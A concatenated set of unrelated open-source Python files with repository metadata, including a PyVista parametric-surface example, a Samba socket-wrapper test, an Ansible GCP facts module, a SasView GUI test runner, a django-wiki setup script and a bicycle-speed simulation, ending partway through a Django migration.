will only work with VMs configured to work with the Compute Accounts
API. If the user does not have a public SSH key, one is generated using
*ssh-keygen(1)* (if the `--quiet` flag is given, the generated key will
have an empty passphrase).
"""
    return detailed_help
# Attach release-track-specific help text to each command class.
SshGA.detailed_help = DetailedHelp('GA')
SshBeta.detailed_help = DetailedHelp('BETA')
|
flgiordano/netcash
|
+/google-cloud-sdk/lib/surface/compute/ssh.py
|
Python
|
bsd-3-clause
| 8,389
|
"""
.. _ref_parametric_example:
Parametric Geometric Objects
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Creating parametric objects
"""
# sphinx_gallery_thumbnail_number = 12
import pyvista as pv
from math import pi
###############################################################################
# This example demonstrates how to plot parametric objects using pyvista
#
# Supertoroid
# +++++++++++
supertoroid = pv.ParametricSuperToroid(n1=0.5)
supertoroid.plot(color="tan", smooth_shading=True)
###############################################################################
# Parametric Ellipsoid
# ++++++++++++++++++++
# Ellipsoid with a long x axis
ellipsoid = pv.ParametricEllipsoid(10, 5, 5)
ellipsoid.plot(color="tan")
###############################################################################
# Partial Parametric Ellipsoid
# ++++++++++++++++++++++++++++
# cool plotting direction
cpos = [
(21.9930, 21.1810, -30.3780),
(-1.1640, -1.3098, -0.1061),
(0.8498, -0.2515, 0.4631),
]
# half ellipsoid
part_ellipsoid = pv.ParametricEllipsoid(10, 5, 5, max_v=pi / 2)
part_ellipsoid.plot(color="tan", smooth_shading=True, cpos=cpos)
###############################################################################
# Pseudosphere
# ++++++++++++
pseudosphere = pv.ParametricPseudosphere()
pseudosphere.plot(color="tan", smooth_shading=True)
###############################################################################
# Bohemian Dome
# +++++++++++++
bohemiandome = pv.ParametricBohemianDome()
bohemiandome.plot(color="tan")
###############################################################################
# Bour
# ++++
bour = pv.ParametricBour()
bour.plot(color="tan")
###############################################################################
# Boy's Surface
# +++++++++++++
boy = pv.ParametricBoy()
boy.plot(color="tan")
###############################################################################
# Catalan Minimal
# +++++++++++++++
catalanminimal = pv.ParametricCatalanMinimal()
catalanminimal.plot(color="tan")
###############################################################################
# Conic Spiral
# ++++++++++++
conicspiral = pv.ParametricConicSpiral()
conicspiral.plot(color="tan")
###############################################################################
# Cross Cap
# +++++++++
crosscap = pv.ParametricCrossCap()
crosscap.plot(color="tan")
###############################################################################
# Dini
# ++++
dini = pv.ParametricDini()
dini.plot(color="tan")
###############################################################################
# Enneper
# +++++++
enneper = pv.ParametricEnneper()
enneper.plot(cpos="yz")
###############################################################################
# Figure-8 Klein
# ++++++++++++++
figure8klein = pv.ParametricFigure8Klein()
figure8klein.plot()
###############################################################################
# Henneberg
# +++++++++
henneberg = pv.ParametricHenneberg()
henneberg.plot(color="tan")
###############################################################################
# Klein
# +++++
klein = pv.ParametricKlein()
klein.plot(color="tan")
###############################################################################
# Kuen
# ++++
kuen = pv.ParametricKuen()
kuen.plot(color="tan")
###############################################################################
# Mobius
# ++++++
mobius = pv.ParametricMobius()
mobius.plot(color="tan")
###############################################################################
# Plucker Conoid
# ++++++++++++++
pluckerconoid = pv.ParametricPluckerConoid()
pluckerconoid.plot(color="tan")
###############################################################################
# Random Hills
# ++++++++++++
randomhills = pv.ParametricRandomHills()
randomhills.plot(color="tan")
###############################################################################
# Roman
# +++++
roman = pv.ParametricRoman()
roman.plot(color="tan")
###############################################################################
# Super Ellipsoid
# +++++++++++++++
superellipsoid = pv.ParametricSuperEllipsoid(n1=0.1, n2=2)
superellipsoid.plot(color="tan")
###############################################################################
# Torus
# +++++
torus = pv.ParametricTorus()
torus.plot(color="tan")
###############################################################################
# Circular Arc
# ++++++++++++
pointa = [-1, 0, 0]
pointb = [0, 1, 0]
center = [0, 0, 0]
resolution = 100
arc = pv.CircularArc(pointa, pointb, center, resolution)
pl = pv.Plotter()
pl.add_mesh(arc, color='k', line_width=4)
pl.show_bounds()
pl.view_xy()
pl.show()
###############################################################################
# Extruded Half Arc
# +++++++++++++++++
pointa = [-1, 0, 0]
pointb = [1, 0, 0]
center = [0, 0, 0]
resolution = 100
arc = pv.CircularArc(pointa, pointb, center, resolution)
poly = arc.extrude([0, 0, 1])
poly.plot(color="tan", cpos='iso', show_edges=True)
|
akaszynski/vtkInterface
|
examples/00-load/create-parametric-geometric-objects.py
|
Python
|
mit
| 5,082
|
# test_socket_wraper.py -- The tests for selftest socket wrapper routines
# Copyright (C) 2012 Jelmer Vernooij <jelmer@samba.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 3
# of the License or (at your option) any later version of
# the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
"""Tests for selftest/socket_wrapper."""
from selftest.tests import TestCase
from selftest import socket_wrapper
import os
class SocketWrapperTests(TestCase):
    """Tests for the selftest socket_wrapper environment helpers."""

    def test_setup_pcap(self):
        """setup_pcap() should export the pcap path via the environment."""
        socket_wrapper.setup_pcap("somefile")
        # assertEquals is a deprecated alias; use assertEqual.
        self.assertEqual("somefile", os.environ["SOCKET_WRAPPER_PCAP_FILE"])

    def test_set_default_iface(self):
        """set_default_iface() should export the interface index as a string."""
        socket_wrapper.set_default_iface(4)
        self.assertEqual("4", os.environ["SOCKET_WRAPPER_DEFAULT_IFACE"])
|
javierag/samba
|
selftest/tests/test_socket_wrapper.py
|
Python
|
gpl-3.0
| 1,327
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ["preview"], 'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_compute_global_address_facts
description:
- Gather facts for GCP GlobalAddress
short_description: Gather facts for GCP GlobalAddress
version_added: 2.7
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
filters:
description:
- A list of filter value pairs. Available filters are listed here U(https://cloud.google.com/sdk/gcloud/reference/topic/filters.)
- Each additional filter in the list will act be added as an AND condition (filter1
and filter2) .
extends_documentation_fragment: gcp
'''
EXAMPLES = '''
- name: " a global address facts"
gcp_compute_global_address_facts:
filters:
- name = test_object
project: test_project
auth_kind: serviceaccount
service_account_file: "/tmp/auth.pem"
state: facts
'''
RETURN = '''
items:
description: List of items
returned: always
type: complex
contains:
address:
description:
- The static external IP address represented by this resource.
returned: success
type: str
creationTimestamp:
description:
- Creation timestamp in RFC3339 text format.
returned: success
type: str
description:
description:
- An optional description of this resource.
returned: success
type: str
id:
description:
- The unique identifier for the resource. This identifier is defined by the
server.
returned: success
type: int
name:
description:
- Name of the resource. Provided by the client when the resource is created.
The name must be 1-63 characters long, and comply with RFC1035. Specifically,
the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
returned: success
type: str
ipVersion:
description:
- The IP Version that will be used by this address. Valid options are `IPV4`
or `IPV6`. The default value is `IPV4`.
returned: success
type: str
region:
description:
- A reference to the region where the regional address resides.
returned: success
type: str
addressType:
description:
- The type of the address to reserve, default is EXTERNAL.
- "* EXTERNAL indicates public/external single IP address."
- "* INTERNAL indicates internal IP ranges belonging to some network."
returned: success
type: str
'''
################################################################################
# Imports
################################################################################
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest
import json
################################################################################
# Main
################################################################################
def main():
    """Entry point: query GCP global addresses and exit with the results."""
    module = GcpModule(argument_spec=dict(filters=dict(type='list', elements='str')))

    # Default to the compute scope when the caller supplied none.
    if not module.params['scopes']:
        module.params['scopes'] = ['https://www.googleapis.com/auth/compute']

    response = fetch_list(module, collection(module), query_options(module.params['filters']))
    # The API nests results under 'items'; normalize a missing/empty key to [].
    found = response.get('items') or []
    module.exit_json(items=found)
def collection(module):
    """Return the GCP global-addresses collection URL for the module's project."""
    base_url = "https://www.googleapis.com/compute/v1/projects/{project}/global/addresses"
    return base_url.format(**module.params)
def fetch_list(module, link, query):
    """GET ``link`` with the given filter ``query`` and return the parsed body
    (None on 404/204; fails the module on API errors -- see return_if_object)."""
    auth = GcpSession(module, 'compute')
    response = auth.get(link, params={'filter': query})
    return return_if_object(module, response)
def query_options(filters):
    """Combine Ansible ``filters`` entries into a single GCP query string.

    GCP's filter grammar expresses AND by juxtaposing parenthesized terms,
    so when more than one filter is given every term that is not already
    fully parenthesized gets wrapped before joining with spaces.

    :param filters: list of filter expression strings (may be None/empty)
    :return: the combined query string ('' when no filters were given)
    """
    if not filters:
        return ''
    if len(filters) == 1:
        return filters[0]
    queries = []
    for term in filters:
        # Wrap any term that is not already parenthesized so the implicit
        # AND (space-join) groups each condition correctly.  The original
        # used `and` (which left half-wrapped terms like "(a" unwrapped)
        # and a pointless ''.join() on a string.
        if term[0] != '(' or term[-1] != ')':
            queries.append("(%s)" % term)
        else:
            queries.append(term)
    return ' '.join(queries)
def return_if_object(module, response):
    """Decode a GCP REST response, failing the module on API errors.

    Returns the parsed JSON body, or None for 404 (resource absent) and
    204 (no content) responses.
    """
    # If not found, return nothing.
    if response.status_code == 404:
        return None
    # If no content, return nothing.
    if response.status_code == 204:
        return None
    try:
        module.raise_for_status(response)
        result = response.json()
    except getattr(json.decoder, 'JSONDecodeError', ValueError) as inst:
        # JSONDecodeError only exists on Python 3; fall back to ValueError.
        module.fail_json(msg="Invalid JSON response with error: %s" % inst)
    # Surface any structured API error payload as a module failure.
    if navigate_hash(result, ['error', 'errors']):
        module.fail_json(msg=navigate_hash(result, ['error', 'errors']))
    return result
if __name__ == "__main__":
main()
|
alxgu/ansible
|
lib/ansible/modules/cloud/google/gcp_compute_global_address_facts.py
|
Python
|
gpl-3.0
| 6,130
|
import os
import unittest
import sys
from PyQt5 import QtGui
from PyQt5 import QtWidgets
"""
Unit tests for the QT GUI
=========================
In order to run the tests, first install SasView and sasmodels to site-packages
by running ``python setup.py install`` in both repositories.
The tests can be run with ``python GUITests.py``, or
``python GUITests.py suiteName1 suiteName2 ...`` for a subset of tests.
To get more verbose console output (recommended), use ``python GUITests.py -v``
"""
# List of all suite names. Every time a new suite is added, its name should
# also be added here
# NOTE(review): perspectivesSuite is defined below but is not listed here,
# so it never runs by default -- confirm whether that is intentional.
ALL_SUITES = [
    'calculatorsSuite',
    'mainSuite',
    'fittingSuite',
    'plottingSuite',
    'utilitiesSuite',
    'corfuncPerspectiveSuite',
    'invariantPerspectiveSuite',
    'inversionPerspectiveSuite',
    ]
# Prepare the general QApplication instance
# (must exist before the suites below construct any QWidget)
app = QtWidgets.QApplication(sys.argv)
# Main Window
from MainWindow.UnitTesting import AboutBoxTest
from MainWindow.UnitTesting import DataExplorerTest
from MainWindow.UnitTesting import WelcomePanelTest
from MainWindow.UnitTesting import DroppableDataLoadWidgetTest
from MainWindow.UnitTesting import GuiManagerTest
from MainWindow.UnitTesting import MainWindowTest
## Plotting
from Plotting.UnitTesting import AddTextTest
from Plotting.UnitTesting import PlotHelperTest
from Plotting.UnitTesting import WindowTitleTest
from Plotting.UnitTesting import ScalePropertiesTest
from Plotting.UnitTesting import SetGraphRangeTest
from Plotting.UnitTesting import LinearFitTest
from Plotting.UnitTesting import PlotPropertiesTest
from Plotting.UnitTesting import PlotUtilitiesTest
from Plotting.UnitTesting import ColorMapTest
from Plotting.UnitTesting import BoxSumTest
from Plotting.UnitTesting import SlicerModelTest
from Plotting.UnitTesting import SlicerParametersTest
from Plotting.UnitTesting import PlotterBaseTest
from Plotting.UnitTesting import PlotterTest
from Plotting.UnitTesting import Plotter2DTest
from Plotting.UnitTesting import QRangeSliderTests
# Calculators
from Calculators.UnitTesting import KiessigCalculatorTest
from Calculators.UnitTesting import DensityCalculatorTest
from Calculators.UnitTesting import GenericScatteringCalculatorTest
from Calculators.UnitTesting import SLDCalculatorTest
from Calculators.UnitTesting import SlitSizeCalculatorTest
from Calculators.UnitTesting import ResolutionCalculatorPanelTest
from Calculators.UnitTesting import DataOperationUtilityTest
# Utilities
from Utilities.UnitTesting import GuiUtilsTest
from Utilities.UnitTesting import SasviewLoggerTest
from Utilities.UnitTesting import GridPanelTest
from Utilities.UnitTesting import ModelEditorTest
from Utilities.UnitTesting import PluginDefinitionTest
from Utilities.UnitTesting import TabbedModelEditorTest
from Utilities.UnitTesting import AddMultEditorTest
from Utilities.UnitTesting import ReportDialogTest
from Utilities.UnitTesting import FileConverterTest
# Unit Testing
from UnitTesting import TestUtilsTest
# Perspectives
# Fitting
from Perspectives.Fitting.UnitTesting import FittingWidgetTest
from Perspectives.Fitting.UnitTesting import FittingPerspectiveTest
from Perspectives.Fitting.UnitTesting import FittingLogicTest
from Perspectives.Fitting.UnitTesting import FittingUtilitiesTest
from Perspectives.Fitting.UnitTesting import FitPageTest
from Perspectives.Fitting.UnitTesting import FittingOptionsTest
from Perspectives.Fitting.UnitTesting import MultiConstraintTest
from Perspectives.Fitting.UnitTesting import ComplexConstraintTest
from Perspectives.Fitting.UnitTesting import ConstraintWidgetTest
# Invariant
from Perspectives.Invariant.UnitTesting import InvariantPerspectiveTest
from Perspectives.Invariant.UnitTesting import InvariantDetailsTest
# Inversion
from Perspectives.Inversion.UnitTesting import InversionPerspectiveTest
# Corfunc
from Perspectives.Corfunc.UnitTesting import CorfuncTest
def plottingSuite():
    """Collect all Plotting unit-test cases into one TestSuite."""
    suites = (
        # Plotting
        unittest.makeSuite(Plotter2DTest.Plotter2DTest,           'test'),
        unittest.makeSuite(PlotHelperTest.PlotHelperTest,         'test'),
        unittest.makeSuite(AddTextTest.AddTextTest,               'test'),
        unittest.makeSuite(WindowTitleTest.WindowTitleTest,       'test'),
        unittest.makeSuite(ScalePropertiesTest.ScalePropertiesTest, 'test'),
        unittest.makeSuite(SetGraphRangeTest.SetGraphRangeTest,   'test'),
        unittest.makeSuite(LinearFitTest.LinearFitTest,           'test'),
        unittest.makeSuite(PlotPropertiesTest.PlotPropertiesTest, 'test'),
        unittest.makeSuite(PlotUtilitiesTest.PlotUtilitiesTest,   'test'),
        unittest.makeSuite(ColorMapTest.ColorMapTest,             'test'),
        unittest.makeSuite(BoxSumTest.BoxSumTest,                 'test'),
        unittest.makeSuite(SlicerModelTest.SlicerModelTest,       'test'),
        unittest.makeSuite(SlicerParametersTest.SlicerParametersTest, 'test'),
        unittest.makeSuite(PlotterBaseTest.PlotterBaseTest,       'test'),
        unittest.makeSuite(PlotterTest.PlotterTest,               'test'),
        unittest.makeSuite(QRangeSliderTests.QRangeSlidersTest,   'test'),
        )
    return unittest.TestSuite(suites)
def mainSuite():
    """Collect the MainWindow unit-test cases into one TestSuite."""
    suites = (
        # Main window
        unittest.makeSuite(DataExplorerTest.DataExplorerTest,  'test'),
        unittest.makeSuite(DroppableDataLoadWidgetTest.DroppableDataLoadWidgetTest, 'test'),
        unittest.makeSuite(MainWindowTest.MainWindowTest,      'test'),
        unittest.makeSuite(GuiManagerTest.GuiManagerTest,      'test'),
        unittest.makeSuite(AboutBoxTest.AboutBoxTest,          'test'),
        unittest.makeSuite(WelcomePanelTest.WelcomePanelTest,  'test'),
        )
    return unittest.TestSuite(suites)
def utilitiesSuite():
    """Collect the Utilities unit-test cases into one TestSuite."""
    suites = (
        ## Utilities
        unittest.makeSuite(TestUtilsTest.TestUtilsTest,           'test'),
        unittest.makeSuite(SasviewLoggerTest.SasviewLoggerTest,   'test'),
        unittest.makeSuite(GuiUtilsTest.GuiUtilsTest,             'test'),
        unittest.makeSuite(GuiUtilsTest.DoubleValidatorTest,      'test'),
        unittest.makeSuite(GuiUtilsTest.HashableStandardItemTest, 'test'),
        unittest.makeSuite(GridPanelTest.BatchOutputPanelTest,    'test'),
        unittest.makeSuite(ModelEditorTest.ModelEditorTest,       'test'),
        unittest.makeSuite(PluginDefinitionTest.PluginDefinitionTest, 'test'),
        unittest.makeSuite(TabbedModelEditorTest.TabbedModelEditorTest,'test'),
        unittest.makeSuite(AddMultEditorTest.AddMultEditorTest,   'test'),
        unittest.makeSuite(ReportDialogTest.ReportDialogTest,     'test'),
        unittest.makeSuite(FileConverterTest.FileConverterTest,   'test'),
        )
    return unittest.TestSuite(suites)
def calculatorsSuite():
    """Collect the Calculators unit-test cases into one TestSuite."""
    suites = (
        # Calculators
        unittest.makeSuite(KiessigCalculatorTest.KiessigCalculatorTest, 'test'),
        unittest.makeSuite(DensityCalculatorTest.DensityCalculatorTest, 'test'),
        unittest.makeSuite(GenericScatteringCalculatorTest.GenericScatteringCalculatorTest, 'test'),
        unittest.makeSuite(SLDCalculatorTest.SLDCalculatorTest, 'test'),
        unittest.makeSuite(SlitSizeCalculatorTest.SlitSizeCalculatorTest, 'test'),
        unittest.makeSuite(ResolutionCalculatorPanelTest.ResolutionCalculatorPanelTest, 'test'),
        unittest.makeSuite(DataOperationUtilityTest.DataOperationUtilityTest, 'test'),
        )
    return unittest.TestSuite(suites)
def fittingSuite():
    """Collect the Fitting perspective unit-test cases into one TestSuite."""
    suites = (
        # Perspectives
        #  Fitting
        unittest.makeSuite(FittingPerspectiveTest.FittingPerspectiveTest, 'test'),
        unittest.makeSuite(FittingWidgetTest.FittingWidgetTest,           'test'),
        unittest.makeSuite(FittingLogicTest.FittingLogicTest,             'test'),
        unittest.makeSuite(FittingUtilitiesTest.FittingUtilitiesTest,     'test'),
        unittest.makeSuite(FitPageTest.FitPageTest,                       'test'),
        unittest.makeSuite(FittingOptionsTest.FittingOptionsTest,         'test'),
        unittest.makeSuite(MultiConstraintTest.MultiConstraintTest,       'test'),
        unittest.makeSuite(ConstraintWidgetTest.ConstraintWidgetTest,     'test'),
        unittest.makeSuite(ComplexConstraintTest.ComplexConstraintTest,   'test'),
        )
    return unittest.TestSuite(suites)
def perspectivesSuite():
    """Collect all non-Fitting perspective test cases (Invariant, Inversion,
    Corfunc) into one TestSuite.  NOTE(review): not listed in ALL_SUITES."""
    suites = (
        #  Invariant
        unittest.makeSuite(InvariantPerspectiveTest.InvariantPerspectiveTest, 'test'),
        unittest.makeSuite(InvariantDetailsTest.InvariantDetailsTest, 'test'),
        #  Inversion
        unittest.makeSuite(InversionPerspectiveTest.InversionTest, 'test'),
        # Corfunc
        unittest.makeSuite(CorfuncTest.CorfuncTest, 'test'),
        )
    return unittest.TestSuite(suites)
def invariantPerspectiveSuite():
    """Collect only the Invariant perspective test cases."""
    suites = (
        # Invariant only
        unittest.makeSuite(InvariantPerspectiveTest.InvariantPerspectiveTest, 'test'),
        unittest.makeSuite(InvariantDetailsTest.InvariantDetailsTest, 'test'),
        )
    return unittest.TestSuite(suites)
def corfuncPerspectiveSuite():
    """Collect only the Corfunc perspective test cases."""
    suites = (
        # Corfunc only
        unittest.makeSuite(CorfuncTest.CorfuncTest, 'test'),
        )
    return unittest.TestSuite(suites)
def inversionPerspectiveSuite():
    """Collect only the Inversion perspective test cases."""
    suites = (
        # Inversion only
        unittest.makeSuite(InversionPerspectiveTest.InversionTest, 'test'),
        )
    return unittest.TestSuite(suites)
if __name__ == "__main__":
    # Run every suite by default; command-line arguments select a subset.
    user_suites = ALL_SUITES
    if len(sys.argv) > 1:
        user_suites = sys.argv[1:]

    # Map of suite name -> (errors, failures) for the final summary.
    # (The original reused the name `errors` for both the dict and the loop
    # variable, shadowing the dict during the summary loop.)
    failed_suites = {}
    for suite in user_suites:
        # Create the suite object from its name; an unknown name is reported
        # but does not abort the remaining suites.
        try:
            suite_instance = globals()[suite]()
            result = unittest.TextTestResult(sys.stdout, True, True)
            print("\nRunning %d test cases for %s" % (suite_instance.countTestCases(), suite))
            result.buffer = True
            suite_instance.run(result)

            if not result.wasSuccessful():
                if len(result.errors) or len(result.failures):
                    failed_suites[suite] = (result.errors, result.failures)
                # Typo fix: "disovered" -> "discovered" in the banners below.
                if len(result.errors):
                    print("\n============ Errors discovered ==================")
                if len(result.failures):
                    print("\n============ Failures discovered ================")
            else:
                print("\nAll tests successful")

        except KeyError as ex:
            print("Failure : %s " % str(ex))
            print("ERROR: Incorrect suite name: %s " % suite)

    if failed_suites:
        for suite, (suite_errors, suite_failures) in failed_suites.items():
            for r in suite_errors:
                print("\nSuite: %s had following errors:\n %s : %s" % (suite, r[0], r[1]))
            for r in suite_failures:
                print("\nSuite: %s had following failures:\n %s : %s" % (suite, r[0], r[1]))
        print("=================================================")
        print("Exiting with error")
        os._exit(1)
|
SasView/sasview
|
src/sas/qtgui/GUITests.py
|
Python
|
bsd-3-clause
| 11,242
|
"""
===========================
Plotting feature importance
===========================
A simple example showing how to compute and display
feature importances, it is also compared with the
feature importances obtained using random forests.
Feature importance is a measure of the effect of the features
on the outputs. For each feature, the values go from
0 to 1 where a higher the value means that the feature will have
a higher effect on the outputs.
Currently three criteria are supported : 'gcv', 'rss' and 'nb_subsets'.
See [1], section 12.3 for more information about the criteria.
.. [1] http://www.milbo.org/doc/earth-notes.pdf
"""
import numpy
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestRegressor
from pyearth import Earth
# Create some fake data: y depends (nonlinearly) on features 0-4 only,
# so features 5-9 should receive near-zero importance.
numpy.random.seed(2)
m = 10000
n = 10
X = numpy.random.uniform(size=(m, n))
y = (10 * numpy.sin(numpy.pi * X[:, 0] * X[:, 1]) +
20 * (X[:, 2] - 0.5) ** 2 +
10 * X[:, 3] +
5 * X[:, 4] + numpy.random.uniform(size=m))
# Fit an Earth model, recording all three importance criteria.
criteria = ('rss', 'gcv', 'nb_subsets')
model = Earth(max_degree=3,
max_terms=10,
minspan_alpha=.5,
feature_importance_type=criteria,
verbose=True)
model.fit(X, y)
# Random forest baseline for comparing importances.
rf = RandomForestRegressor()
rf.fit(X, y)
# Print the model
print(model.trace())
print(model.summary())
print(model.summary_feature_importances(sort_by='gcv'))
# Plot the feature importances: one bar chart per criterion, plus the
# random-forest importances as a fourth panel for comparison.
importances = model.feature_importances_
importances['random_forest'] = rf.feature_importances_
criteria = criteria + ('random_forest',)
idx = 1
fig = plt.figure(figsize=(20, 10))
labels = ['$x_{}$'.format(i) for i in range(n)]
for crit in criteria:
    plt.subplot(2, 2, idx)
    plt.bar(numpy.arange(len(labels)),
            importances[crit],
            align='center',
            color='red')
    plt.xticks(numpy.arange(len(labels)), labels)
    plt.title(crit)
    plt.ylabel('importances')
    idx += 1
# Raw strings keep the LaTeX backslashes (\sim, \mathcal, \pi) from being
# parsed as (invalid) string escapes; the '\n' between them stays a newline.
title = (r'$x_0,...x_9 \sim \mathcal{N}(0, 1)$' '\n'
         r'$y= 10sin(\pi x_{0}x_{1}) + 20(x_2 - 0.5)^2 + 10x_3 + 5x_4 + Unif(0, 1)$')
fig.suptitle(title, fontsize="x-large")
plt.show()
|
mehdidc/py-earth
|
examples/plot_feature_importance.py
|
Python
|
bsd-3-clause
| 2,142
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
import os
from wiki import VERSION
from setuptools import setup, find_packages
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def get_path(fname):
    """Resolve *fname* relative to the directory containing this script."""
    base_dir = os.path.dirname(__file__)
    return os.path.join(base_dir, fname)
def read(fname):
    """Return the text contents of *fname*, resolved relative to this file.

    Uses a context manager so the file handle is always closed; the original
    left the handle open until garbage collection.
    """
    with open(get_path(fname)) as fh:
        return fh.read()
# Base install requirements; version-conditional extras are appended below.
requirements = [
    "Django>=1.4,<1.7",
    "django-sekizai>=0.7",
    "Pillow",
    "django-nyt>=0.9.4",
    "django-mptt==0.6.0", # 0.6.1 broken: https://github.com/django-mptt/django-mptt/issues/316
    "six"
]

# Requirements that depend on Django version: South and sorl-thumbnail
try:
    from django import VERSION as DJANGO_VERSION
except ImportError:
    # No django so assuming that a new one will get installed...
    # TODO/FIXME: Remove the South req line here when Django>=1.7 is accepted
    requirements.append("South>=0.8.4")
    requirements.append("sorl-thumbnail>=11.12.1b")
else:
    # Django < 1.7 has no built-in migrations, so South is required.
    if DJANGO_VERSION < (1, 7):
        requirements.append("South>=0.8.4")
    if DJANGO_VERSION < (1, 5):
        # For Django 1.4, use sorl-thumbnail<11.12.1:
        # https://github.com/mariocesar/sorl-thumbnail/issues/255
        requirements.append("sorl-thumbnail<11.12.1")
    else:
        requirements.append("sorl-thumbnail>=11.12.1b")

# Requirements that depend on Python version: Markdown
from sys import version_info as PYTHON_VERSION
if PYTHON_VERSION < (2, 7):
    # For Python 2.6, use Markdown<2.5.0, see
    # https://github.com/waylan/Python-Markdown/issues/349
    requirements.append("Markdown>2.2.0,<2.5.0")
else:
    requirements.append("Markdown>2.2.0")
# long_description is produced from README.md via pypandoc when available;
# PyPI needs reStructuredText, so the converted text is also cached in
# README.rst.  A missing pypandoc/README only matters for PyPI uploads.
# (The original also bound an unused ``packages = find_packages()`` here;
# setup() computes its own package list below, so that dead call is removed.)
try:
    import pypandoc
    long_description = pypandoc.convert(get_path('README.md'), 'rst')
    long_description = long_description.split(
        '<!---Illegal PyPi RST data -->')[0]
    # Context manager guarantees the handle is closed even on write errors.
    with open(get_path('README.rst'), 'w') as f:
        f.write(long_description)
except (IOError, ImportError):
    # No long description... but nevermind, it's only for PyPi uploads.
    long_description = ""

setup(
    name="wiki",
    version=VERSION,
    author="Benjamin Bach",
    author_email="benjamin@overtag.dk",
    url="http://www.django-wiki.org",
    description="A wiki system written for the Django framework.",
    license="GPLv3",
    keywords="django wiki markdown",
    packages=find_packages(exclude=["testproject", "testproject.*"]),
    # long_description=long_description,
    zip_safe=False,
    install_requires=requirements,
    classifiers=[
        'Development Status :: 3 - Alpha',
        'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
        'Environment :: Web Environment',
        'Framework :: Django',
        'Intended Audience :: Developers',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
        'Topic :: Software Development',
        'Topic :: Software Development :: Libraries :: Application Frameworks',
    ],
    include_package_data=True,
)
|
prabhanshu/django-wiki
|
setup.py
|
Python
|
gpl-3.0
| 3,295
|
from django.core.management.base import BaseCommand, CommandError
from analytics.models import ChannelDetails
from analytics.parser import ParseChannel
class Command(BaseCommand):
    """Management command: wipe cached ChannelDetails rows and re-seed the
    analytics database via the channel parser."""

    def handle(self, **options):
        # Drop any previously collected channel details before re-seeding.
        ChannelDetails.objects.all().delete()
        parser = ParseChannel()
        parser.initialize_db()
        # (Removed a commented-out polling loop that was dead code.)
|
shiminsh/youtube_analytics
|
youtube/analytics/management/commands/initializedb.py
|
Python
|
mit
| 489
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 11 16:39:58 2016

Compute a bicycle's speed while riding up and down a slope using Euler's
method.  (Docstring and comments translated from the original Chinese.)

@author: nightwing
"""
from math import atan,sin
import matplotlib.pyplot as plt
g = 9.8 # gravitational acceleration (m/s2)
DENSITY = 1.29 # air density (kg/m3)
C = 0.5 # drag coefficient
A = 0.33 # frontal cross-section area (m2)
M = 70.0 # combined mass of rider and bicycle (kg)
v1 = 4.0 # (uphill) speed (m/s)
v2 = 4.0 # (downhill) speed (m/s)
P = 400.0 # rider power output (W)
t = 0 # initial time
t_max = 200 # end time (s)
dt = 0.1 # time step (s)
time = [] # stores the time points
velocity1 = [] # stores the uphill speeds
velocity2 = [] # stores the downhill speeds
#--- Euler's method: power drive - air drag -/+ gravity on a 10% grade ---
while t <= t_max:
    velocity1.append(v1)
    velocity2.append(v2)
    time.append(t)
    v1 += P/(M*v1)*dt-C*DENSITY*A*v1**2/(2*M)*dt-g*sin(atan(0.1))*dt
    v2 += P/(M*v2)*dt-C*DENSITY*A*v2**2/(2*M)*dt+g*sin(atan(0.1))*dt
    t += dt
#------------ plotting ---------------
plt.title("Bicycling simulation: velocity vs. time")
plt.xlabel("time (s)")
plt.ylabel("velocity (m/s)")
plt.plot(time,velocity1,"k-",label="up")
plt.plot(time,velocity2,"k--",label="down")
plt.legend(loc=5)
plt.show()
|
WuShichao/computational-physics
|
2/2_4/2_4.py
|
Python
|
gpl-3.0
| 1,243
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Create the Author/Campaign/Comment/Idea/Location/Vote models and wire
    up their relations.

    Fix: ``parent_id`` previously passed ``max_length=50`` to IntegerField;
    ``max_length`` is not a valid IntegerField option (Django ignores it and
    its system checks flag it), so the kwarg has been dropped.  The stored
    column is unchanged.
    """

    dependencies = [
        ('ideascale', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Author',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('ideascale_id', models.IntegerField()),
                ('name', models.CharField(max_length=100)),
                ('email', models.EmailField(max_length=254)),
            ],
        ),
        migrations.CreateModel(
            name='Campaign',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('ideascale_id', models.IntegerField()),
